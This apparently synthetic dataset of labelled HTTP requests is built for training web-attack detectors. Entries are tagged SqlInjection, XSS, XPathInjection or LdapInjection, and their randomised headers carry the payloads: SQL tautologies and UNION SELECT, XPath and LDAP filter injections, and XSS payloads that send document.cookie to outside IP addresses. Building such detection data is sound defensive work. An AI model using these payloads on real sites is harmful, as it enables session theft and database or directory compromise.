If-Range: Tue, 02 Aug 05 09:26:38 UTC
Max-Forwards: 759
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM aXU3aWFyc3Nham9pQml5b2VudE5waXJhc2VjbWhhWGNrZG5lc2hlcg==
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: http://www.8nhEiIki.biz/ce0lrp/hu2s.jsp
TE: trailers,trailers
Trailer: Range
User-Agent: mlolttscbs/3.7.7.7
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 352x848
Via: HTTP/3.6 87.233.253.97:0, etId/1.4 www.oeOpyh.js, FTP/8.6 www.3Ear.gif
Transfer-Encoding: 6ris; osgnkcE=urwji
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 226 1.81.131.108 "aituhaeselhhae" 
X-Forwarded-For: 152.199.223.60
X-Serial-Number: 87791101469123011682
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44251
Start - Id: 41422
class: SqlInjection
PUT /exRJVvR.j6/laiHS3-nrK/hmOWBtweGSopt/d-wXm7S-nYiXbQFk/rNi_S5@Mm1__q/er6Qh73mM8Ht88juYB/f4ihcnnttahl/d3teF0byzg0nni/5iolulrrohtkll/aWVVE4V2k2N/sN6dXco3eto/r730dwgetoW6includeinputR.html? HTTP/1.1
Content-Length: 111
Content-Language: wdfaaso,yh
Content-Encoding: deflate
Content-Location: http://ONhes.fr/gldtcng/25ed.asmx
Content-MD5: bGVhcWV6Y29hbGRydG1rZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 11 Sep 06 02:16:40 UTC
Last-Modified: Mon, 27 Sep 04 01:35:13 GMT
Host: www.o0r9mRpnme.fr:60
Connection: close
Accept: text/html
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 83.0.8.151
Cookie: tneoetbluddecsu=13692;eua=67976;rcdattS80=t
Cookie2: $Version="458"
Date: Tue, 15 Jun 04 07:46:57 GMT
ETag: W/"4aBq-mQ1_DiT7vYxf"
Expect: tc0tlrr=dszryZw7
From: hbituu@nl5IshaU.be
If-Modified-Since: Thu, 28 Jan 10 07:51:02 UTC
If-Unmodified-Since: Thu, 11 Feb 10 04:25:01 UTC
If-Match: *
If-None-Match: "Q_xzAcawW6rDinuyARp"
If-Range: Fri, 24 Feb 06 11:02:49 CET
Max-Forwards: 4
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM c2l0OGZsbXJxZUttemxlMG5hdGh1cG9zZmVzcnJ1ZWVlaHNoa2dueU1Oa3R0cg==
Authorization: Digest cnonce="eHrzno0l"
Range: 4509-,62-022408,-4198
Referer: /1jjbesaf/lapo8r/ngb7eT7i/lousjo/8qaYot1a.gz
TE: trailers,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.3 (X11; U; Linux i386 0.0; is-bb; rv:4.6.8) Gecko/09868826
UA-CPU: MIPS
UA-Disp: 0773,9723,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 738x118
Via: 3.7 www.hiedagn.jpg, FTP/6.9 33.147.112.242
Transfer-Encoding: atams; eeonr=i4etmno
Upgrade: rht/5.4
Warning: 149 193.52.96.248 "8Xhauustfrrwxeheore" 
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 9168693821015244526
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

img0IbmtelnetNKF=' OR 'eu2a'   LIKE    'aze%25&adeononagnthoo=rdelee5teoaia&7sj=xc5&noath2grlEvr4oo=4

End - Id: 41422
Start - Id: 41919
class: SqlInjection
GET /sIUHSgTIXRyRJL7RWeCD.html?eitns=%27++++union+++++select+++++sum%28sdL0t%29++from++++eud3jie-- HTTP/1.1
Host: 91.193.50.117:93586
Connection: s0lo
Accept: image/png;q=0.0, text/*;q=0.2, video/quicktime;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 21.123.50.241
Cookie: pshtlhcpanaqii=vft
Cookie2: $Version="615"
Date: Thu, 22 Oct 09 20:25:46 GMT
ETag: "MLO5o.MWGTcwAKH2E"
Expect: 100-continue
From: PtDlsore@tsfosgnuwd.be
If-Modified-Since: Wed, 09 Apr 08 01:18:03 UTC
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 049
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: 2Ho7ed eirUuuo=behe
Authorization: biht6r hntyr=lsiNat
Range: -0
Referer: http://eEit8n.org/aet7l/rukf/tee6i/aaai.swf
TE: chunked;q=0.2,trailers,trailers
Trailer: Via
User-Agent: yvalStre/3.0.2
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9010x724
Via: 9.3 www.ibefT.tiff
Transfer-Encoding: deflate
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 206 www.hpaefstE.jpg "2ytytu1" "Wed, 13 Sep 06 14:39:38 GMT"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41919
Start - Id: 47304
class: XSS
GET /dsveD9g/hP.gGlh@LGBVMs2FkM/onraPtpdbfn/itYiOmesdmesinR/ay4isL6hohtwoteo4ato/CgLmBUCV_L4/eNUEswTnD8ILkhMp/733Al/JvZaPYe-@MrZd_/aeyynae8mlsseSano8ac/96y./lslEensemi0seee.php?EKnullV=%3Ciframe++++src++%3D+++%22+++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F149.254.79.11%2Ferch.mdb%27%2Bdocument.cookie%29%3B%5D++++++%22+%3E&an9eAeT=positionnchild9eiypu HTTP/1.0
Host: www.ssarelIk.org:56
Connection: nhdethun
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=8681
Client-ip: 226.203.48.223
Cookie: Wniibn=yexecge7eMt;mHhsz=858426670
Cookie2: $Version="1"
Date: Sat, 08 Jul 06 09:19:32 UTC
ETag: "XjJvcVzPg2kiAhQYG2q"
Expect: Aaog
From: told@ol9na.de
If-Modified-Since: Fri, 19 Feb 10 21:43:02 GMT
If-Unmodified-Since: Sat, 23 May 09 21:42:32 UTC
If-Match: "PhSsJ0YAw6FeHqIO"
If-None-Match: *
If-Range: Tue, 04 Sep 07 01:08:15 UTC
Max-Forwards: 8994
MIME-Version: 0.1
Pragma: ep5te=pe08
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: eljvaE dmsot=omnus5
Range: -40347,67-1
Referer: http://www.ouwtym.de/vyhaks.mp3
TE: deflate,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.6 (Windows; U; Win98 5.6; nk-rF; rv:9.4.3) Gecko/94732039
UA-CPU: Sparc
UA-Disp: 3262,6443,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: 5.9 57.244.44.116
Transfer-Encoding: deflate
Upgrade: nPcun/8.0, aNCmem/7.3, aiz/3.2, 5no/1.9
Warning: 444 214.91.5.142:2 "utenrsgvrEdai" 
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 1360027
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47304
Start - Id: 47461
class: XSS
GET /plZi6/rMiV0.RY7YTJ8gGi0dJ.png?fwc0dHq_-=6111445&42l_MA=7153475&-.JGP2=%3Cdiv++++style%3D++++%22+++++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.asmesest.com%2Fscript%2FnGeq.php4%5D%29%3B++%22+++%3E&ipew4t=aannet+e1omphaa&1Eq=9164&aeoteetl8niattE=He&ttaish=nosXC&Thle0R=tn+t&8ii=mfP&mIsx=deo%24likea%3BeNerselectscriptwp&KoC@RtOm0qo.=luo HTTP/1.1
Host: www.gsaafee7.uk:935
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: eelae-nufhw, sdplrqh-c;q=0.2, m-l, yhrlii-m
Cache-Control: ee=smcD
Client-ip: 146.143.28.253
Cookie: likeincludesopendR3eA=<0i;atb=moo5incrya;rfkehecTmgay=8385090;r9oShmobeqm3=ptto;aKIO8fI=6685
Cookie2: $Version="305"
Date: Sat, 17 Jul 04 06:36:23 GMT
ETag: W/"UCqG8sTrPrBsCcr7vUF"
Expect: 100-continue
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Sun, 09 May 04 22:25:54 UTC
If-Unmodified-Since: Fri, 29 Sep 06 12:24:47 CET
If-Match: "dsqezla3Zlk5Dna"
If-None-Match: "wJZdEznWz3@__eR87A"
If-Range: Fri, 22 Jul 05 09:24:42 CET
Max-Forwards: 6405
MIME-Version: 9.9
Pragma: iiu=rioxn
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic ZXVvb2dzOmJzME9kbA==
Range: 9547-817639
Referer: http://oserncee.biz/i7eay2r/dlt7hw/3Mio/ugOpotr.conf
TE: chunked;q=0.1,trailers
Trailer: From
User-Agent: hlwl/0.4.0.0
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4671x382
Via: 6.1 www.3ohs.jpg
Transfer-Encoding: gzip
Upgrade: rshhh0/1.3
Warning: 308 www.aenio10r.gif "lnesbftg" "Sun, 10 Aug 08 14:30:39 UTC"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47461
Start - Id: 50019
class: XPathInjection
PUT /2sEJL78dJ/taR1shse/e3NiSlO0RyepkCJuF/zF_OweN2PmtnUid/Tq/@OiU5/aNcrt/scriptVRf5DtBDPnetcatncZ.asmx? HTTP/1.1
Content-Length: 171
Content-Language: Ue,qfnevsa8,3he
Content-Encoding: deflate
Content-Location: http://10eeheeg.biz/ohmr3/yapov57t.cgi
Content-MD5: emVlRXBxc2d0dHJndGZhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 21:57:12 GMT
Last-Modified: Sun, 10 May 09 17:17:49 CET
Host: www.Tt85hwc.com
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-4, windows-874, x-mac-arabic;q=0.9, iso-8859-3
Accept-Encoding: Reonr5' or   epav0/ecs/child::node()[processing-instruction()=77] or 'nsSxae'  =    '
Accept-Language: *;q=0.3
Cache-Control: max-age=816
Client-ip: 32.102.243.79
Cookie: tncsfn=slservicesle;nr=47984596;br7yU=80326179;dmabdt=aPx
Cookie2: $Version="72"
Date: Thu, 18 Mar 04 19:52:48 CET
ETag: "JNImyIsVCIyz3habo"
Expect: A1a1ao=ix1nii;Dh5t
From: helbt@metbhhshe.st
If-Modified-Since: Sun, 09 Jan 05 15:36:24 CET
If-Unmodified-Since: Wed, 27 Jan 10 17:04:27 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Sep 06 09:06:31 GMT
Max-Forwards: 08
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic dHNuOG86emxtYkd5b2g=
Authorization: NTLM VXQ3ZjNydEhnRXluNTZjYTN2MHBya25wOG5pbmV1b3dxRXc3ZWQzY29pb3hl
Range: 7-907,5585-81749,-584464
Referer: /0gTn/ng2me.tar.gz
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: se9asna0sgaoeomrifn
UA-CPU: 68000
UA-Disp: 5607,073,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2146x828
Via: FTP/6.6 www.atollqtt.htm, 2.7 www.sqs2yi.shtml
Transfer-Encoding: gzip
Upgrade: exR/8.9, zdsd/9.0, tOnl/2.3, 6fWla/2.1, ssod/8.7
Warning: 122 161.241.199.246:74079 "tsotlrnCt" "Sat, 16 Apr 05 20:50:24 UTC"
X-Forwarded-For: 84.189.52.115
X-Serial-Number: 69751520356030770704
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lva=wo&9i=0043&8trnhl6ETez1fr=gincludefr&ae=h1fd&rp=018726135&dnrrifnaO=tvCeUiosltwbdSd&zAdNerDntzaj9=|7on&jrNeoc=59204&hdss0oatieoK=jZF&es=oirI2TeeaeesdcnM&cr=v7KL7qenn

End - Id: 50019
Start - Id: 35578
class: XPathInjection
GET /gT5z3hG@b1r5.i7TW/emRvahE-EWLzmTrfEL9y/if51w@OaYH6u6VZI/xkVYfld5p927/hmdnrehSja8/aolloud4snDirdt4/hLh/NT326Y9n.sh?coAEUu2ngyaedaa=77&bchildTinclude8dLxWs=ri%27+++or+++++4%2F8re%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D6%5D+++++or++++%273m5l%27+++%3D+%27&sdapsko=1&ti5ls2we=aXO0tc39V&42VEdwherescriptT=741 HTTP/1.1
Host: www.alaIdtsdb.com
Connection: le7sl
Accept: audio/x-wav;q=0.9, application/*, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=50554
Client-ip: 252.234.242.120
Cookie: skelweae=gVab;kArg1UR39W.Q=cu3RA3wtJllY;aTesim9Ytdltcqs=9;roytsij=8
Date: Tue, 09 Aug 05 18:58:12 UTC
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
If-Modified-Since: Sat, 01 May 10 16:22:40 CET
If-Unmodified-Since: Thu, 02 Oct 08 05:55:40 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Tue, 01 Jun 04 09:16:46 GMT
Max-Forwards: 245
MIME-Version: 1.5
Pragma: Aoo6='al'
Authorization: Basic dXk2aHBudTpveTV4aXJ1eQ==
Range: 1278-6
Referer: /mme1at.dll
TE: trailers,chunked;q=0.6,deflate;q=0.2
User-Agent: Mozilla/5.1 (compatible; gskhzr7e; Windows NT; btHnowesy)
UA-OS: Win98
Via: 0.5 www.rathrte.css
Upgrade: qqbAbn/3.5, de6/4.4, i7xow/6.7
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 36638700307195
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35578
Start - Id: 49171
class: XPathInjection
GET /aO4mloLdtnsanNGhta/lrpam0tlee9j/nCQpF1zrTtE/zJi1v/raOLmxgykiJkL.php?2ndMjw=l.LBes&othO9y=a9i&8eimrleoyaepai6=t%2Bemwxs%25&aislmhsrqdpa=1sipe%27+or++%28i++%3C+count%28hnul%2Fchild%3A%3Atext%28%29%29++++and++++j+++++%3C++++count%281b4pNu%2Fchild%3A%3Acomment%28%29%29+and++k++++%3C++++count%28at%2Fchild%3A%3A*%29+++++%29+or+%27aheydUth%27++++%3D++++%27++++excyt%27+++++or&6litadhx=53371&t96nli5L=euhUIC9gl5Op&yyjO=teud&itp4simt4wh=%28hr&sedmcEt=4591 HTTP/1.0
Host: 204.217.219.14
Connection: keep-alive
Accept: audio/*;q=0.4
Accept-Charset: x-mac-icelandic, hz-gb-2312, iso-8859-2, iso-8859-2;q=0.8, iso-10646-ucs-2;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: sicA-th1s
Cache-Control: max-age=048
Client-ip: 38.175.250.11
Cookie: mfihztew9l0seIj=9
Cookie2: $Version="086"
Date: Sun, 25 Nov 07 13:51:22 CET
ETag: "mOIFkg9nVCC_XPd"
Expect: 100-continue
From: sbgdd@uletat2q.net
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Sun, 16 Nov 08 08:04:31 GMT
If-Match: *
If-None-Match: "st4x0Mea.kYgi2.46"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic NGk2ZWVsOnJhcm1sSGM=
Range: 96-,87333-9
Referer: /nanqSjae/eX0SAwth/wort/34sneill/rncha.gif
TE: trailers,trailers,chunked
Trailer: TE
User-Agent: n3cqEt/8.6.3.9
UA-CPU: x86
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 290x3654
Via: 6.0 142.227.212.105, 8.2 163.93.226.180, HTTP/2.0 www.gtftHloh.gif
Transfer-Encoding: gzip
Upgrade: taetg/0.8, tzsep/3.3
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 887943993
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49171
Start - Id: 48223
class: XSS
PUT /bV.vxu_DBIB-/imtre/1hAM/exxl5sa57Am/dmleaenDms/kKacceptb1zRiXAE/nneoEploea/sc3/ptiglwlrcatae.exe? HTTP/1.0
Content-Length: 302
Content-Language: arlh4tay,djeE1
Content-Encoding: gzip
Content-Location: /wxEiwh/yitha5mp/tMzmioi/tho0oerb/tTehe9tc.nsf
Content-MD5: R21GdGt0YXRvaWF3dGxwbQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 14 Jan 05 18:29:43 GMT
Host: www.oenis5ie.com
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 43.56.9.140
Date: Wed, 05 May 04 13:31:10 UTC
If-Modified-Since: Tue, 26 Oct 04 21:10:53 GMT
If-Unmodified-Since: Tue, 16 Jan 07 01:27:48 UTC
If-Match: "kyzn_LyXxQK5gdV8Yfd"
If-None-Match: "GwJ6RUBTiUbe8HTdg"
If-Range: *
Max-Forwards: 392
Authorization: Digest realm
Referer: /aueMuhee/tom1/37ie.css
TE: trailers
User-Agent: <img    src   =  "   livescript:[window.open('http://179.115.79.251/arit.mdb'+document.cookie);]       "  >
Upgrade: 9a5/8.2, n3n/3.3

cimanauadoTe=eICD0l&reoig2eetm5oqo=cm]8ihjiA&ftsIgihhinv=39282&eP8eQ3pncJ=f38Xr&_eIqazbWtmp2=tmetaod&ve2dmlrodi=00674&p4openbdb=drstntaNwRtu&ydeohoD2htesht=0542182&NiframexaR0_V=p&rff8ihodeRto=Isttmdiimptnrael6&eevlRazcEw=i8reum8gae&Tkemysh=864&GNGmmxmlbKbody@VP=22851&lehtR6=|t  Ywn4@vuSf\?e

End - Id: 48223
Start - Id: 38800
class: LdapInjection
GET /o2lUIRiWZ77erXsUew/gb7sQ7tow/tmuuywhebsR7eotbwnr/lvxdtLC/rQ.U4O0J5z@QPv2_Ua95/cfOSv9e7ner/1rBBl.php4?B8objectp1fC8YqC=m3%26e&9Ns1ne=lxmlt0bd&vwd=oCaS9oWF&9asegav8tisj1s=7yshtxttux%2Btte&ieneqleoh=Zyrsnlrlc&e3tNeiwfdnh=nQ.V&bT=eoaef%29%28%7C++%28tuan%3D*%29 HTTP/1.0
Host: www.tont.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: shift_jis, x-mac-arabic, euc-kr;q=0.0
Accept-Encoding: compress, deflate
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 103.147.207.153
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Tue, 09 Nov 04 17:29:48 CET
ETag: "954BYt15GW0-QKluibg"
Expect: 100-continue
From: yRoml@orAqOa.ch
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Fri, 06 Feb 04 11:18:15 GMT
If-Match: "ZzBZb2KUg_iTlkV@"
If-None-Match: "96hepxWdtqgSOw8Agg"
If-Range: Sun, 22 Feb 09 23:52:27 GMT
Max-Forwards: 8
MIME-Version: 3.1
Pragma: hlne=hai
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 89831-,-364983
Referer: /thldopa/HDtgYb/eacit2a.gif
TE: trailers
Trailer: Accept-Language
User-Agent: isentgitdiimmn
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: ezoBi/6.6 166.199.71.86
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38800
Start - Id: 48976
class: XPathInjection
GET /-1jBzstdinkWLF1A82W/ero.css?lDnue=betweenr+&reloemico=kttanHt%27++or+++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28i+++%2Bj++++%2B+k++%2B++l+%2B++1%29%5D+++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++%27sn%27++++%3D++%27+++++tamna%27+++++or&tlri2r1p=oix0s0ahaii4deihn&OX3sxn=shfteeatSc&ebsfinl5du=aEesn8k03ffiee&Odn=eutosethttpshtpasssre&heci3aeobpcee=%7E%28+t&JL-boot.iniT.vHUv=ydlobbersHam5sizs&G7dOzqk8uW8Z=ero8%5Csf2&sal1ee=29&oE=deewl HTTP/1.0
Host: 7.127.185.176:44234
Connection: eusan
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.1
Accept-Encoding: 
Accept-Language: 5ssa-eeaNkAe;q=0.3
Cache-Control: max-stale
Client-ip: 196.26.247.32
Cookie: hb1odHw=0061587;ereihbnsen=ecypf6BIIN;XD.WTCrW9LL-=alqmkbJ;yoiehuOi=1297;Relogmgiernwz=621230;sxqoeee=2699452691
Cookie2: $Version="23"
Date: Wed, 28 Oct 09 18:18:09 UTC
ETag: "4QmhRB4r6WXtHBkjG4w"
Expect: 100-continue
From: Sd34@Ehnom.cz
If-Modified-Since: Mon, 01 Oct 07 22:41:53 CET
If-Unmodified-Since: Tue, 23 Jan 07 15:41:20 CET
If-Match: *
If-None-Match: *
If-Range: "Htfa-zu1braBl@zn0"
Max-Forwards: 6884
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: /lsEr/qp14.wav
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.6 (compatible; ssoX; Open BSD i386; txsu; nUetzU)
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: 1.5 64.159.174.14:29
Transfer-Encoding: 5yIob; phrE3=htnotnEd
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48976
Start - Id: 37462
class: LdapInjection
GET /a_RT/rC8/exfe4hn1/_7jgFcatzz/iA.Jo47UehS5le/tjhmuEr6a/unaaua/lRYM-zNvnKUR9fQMD.css?KTd3n2ftpscriptMnBc=aP3fni&9dtor3ow2er=i_AZZb&wz3iHsfEnByejic=824&yoet=ti&cadrenrettbu=7&lnt9e77etIp=a+&goBn=obanh%40%7EesEete&cd1cWusS=37354&rldaefioNstueae=A%25N%3Ftlocation0sepD&SPost=fromTadiv&sJhh=94285158 HTTP/1.0
Host: www.nahAetl.com:0
Connection: keep-alive
Accept: image/*, audio/*;q=0.5, audio/basic;q=0.1
Accept-Charset: shift_jis, iso-8859-8-i, x-mac-turkish, x-mac-chinesesimp, ks_c_5601-1987
Accept-Encoding: identity;q=0.3, compress, compress;q=0.2, compress;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 97.241.16.223
Cookie: n1tyeNstnm=do;ITgtorcs7=04313;nittheuahaesn=2649)(&(objectClass=1nei)(|(sn   =   9UeA)(cn=pcee    J*))
Cookie2: $Version="3"
Date: Sun, 31 Jul 05 02:41:52 UTC
Expect: 100-continue
From: iitavrt@pe0f.st
If-None-Match: "SJaH0V.mOvwTf8VIajr"
Authorization: NTLM b3RhbW1TcnRvRnR3aWVkaXJOZ3JuNWkwdG5vZW9kdGFwbmpucw==
Referer: http://www.uea7.ch/hoE3oc/jylqeno/Ni9a.swf
Trailer: If-Range
User-Agent: enordaur (leZaLtbR)
UA-OS: Win9x
Transfer-Encoding: pieta
Upgrade: l7van/3.4

null

End - Id: 37462
Start - Id: 48321
class: XPathInjection
GET /ft/m.1NyC3x/tyHoI.YZdTr2/wJajf6c/icete/s0ii0aemeritttaeih0Y/ehnqSQXRu4Z/gbh/-9MGcE0-/ogRaxrXdnlSwfd.msf?9l6rasnedw6mt=U HTTP/1.0
Host: www.sru3r1Uf.cz:94232
Connection: keep-alive
Accept: text/html
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: nereo-ge;q=0.0, ohxbUY-p;q=0.9, st-e, bsmsd-a, ytcBndh-A;q=0.5
Cache-Control: no-cache
Client-ip: 137.170.35.34
Cookie: 7gy.Nshutdown.=54;Iy_FSJ5D6Hg=434969;cphnk=ntyRRkwnr
Cookie2: $Version="9"
Date: Thu, 22 Jun 06 10:08:00 GMT
ETag: W/"683Tkn1roCDkCKGYEt"
Expect: teda
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Fri, 12 Aug 05 02:03:38 UTC
If-Unmodified-Since: Thu, 10 Apr 08 12:07:25 UTC
If-Match: "5@lit5Gf6gB8ypW"
If-None-Match: *
If-Range: "od@Rp-TXux0Nbrg"
Max-Forwards: 9587
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: NTLM cmhmYmtpRTZ5aEdkeTFyN3BlWENoZmNEY2xuT290dXRuaXZnTGxhUA==
Range: -1
Referer: http://www.sjAie.org/sf4syeqs.exe
TE: trailers,chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: axeeD3ce'    or    rhr/ilwau/child::node()[processing-instruction()=083]     or   'rsosacmS' =    '
UA-Disp: 296,6544,16
UA-Color: color8
UA-Pixels: 433x249
Via: 2.1 160.218.249.25, urbg/2.6 215.20.238.202, HTTP/8.0 220.38.224.42:8
Transfer-Encoding: compress
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 545 www.lmrboeu.jpeg "maAlRieci" "Mon, 07 Mar 05 16:38:52 UTC"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48321
Start - Id: 41727
class: SqlInjection
GET /egpaF-gb56/arfqensi0/htwe/iijfmusjodssmi1ri/t0fw0YA-4h/ueenrraTectuohos/bs/sZ-Zq/6hkrihd/hweeth95satinh7dshh/oLK6IXtfY..cfm?tndfteS6t=e3c3ztmpcmdi%26rcpkcopynthomees&7awlh=OrigText%27OR%27At%27%3D%272ti%27&cmdYMqFWDlOc=989787&ostcMadra=8cpet26peyrdtqt&Eo=ercpji&rqetzkheSnCsdrf=styledOeezIhom%40oy%7Eh%29d5 HTTP/1.1
Host: www.6nolstE.com:80
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 130.12.152.206
Cookie: _WoQ=idai;i7Qeufemcsst=gHi1se1znounnlag8;o8Hh9t4jM@=eOpjrt7t5C34t1h
Cookie2: $Version="6"
Date: Fri, 18 May 07 24:43:02 UTC
ETag: "x-y4MP-XTys@LWVZvO_A"
Expect: 100-continue
From: weLnae2@eCsehh7ca.cz
If-Modified-Since: Sun, 23 Aug 09 08:04:15 GMT
If-Unmodified-Since: Tue, 01 Apr 08 21:28:37 GMT
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: "@Y6hzZv2wbBivlH"
Max-Forwards: 073
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic bHU2dGQ6bWN0Tndp
Range: 111-,-67748,-483206
Referer: http://yRerat.de/teTg/Amtik8/tsdEme/dEmCnse/reaeawat.asmx
TE: gzip,trailers,deflate
Trailer: Via
User-Agent: aLL_6YnBDM http://www.derxueC.fr
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3172x1738
Via: ERqer0/6.5 143.127.90.240, HTTP/6.7 www.to8ctr.jpg:48909, 2.3 83.249.237.195
Transfer-Encoding: compress
Upgrade: kmeyp7/6.4, oab/2.7, peZa/7.9, tihsau/8.6, rstvvt/0.5
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 3549851527623289
----: -------------------------------------------------
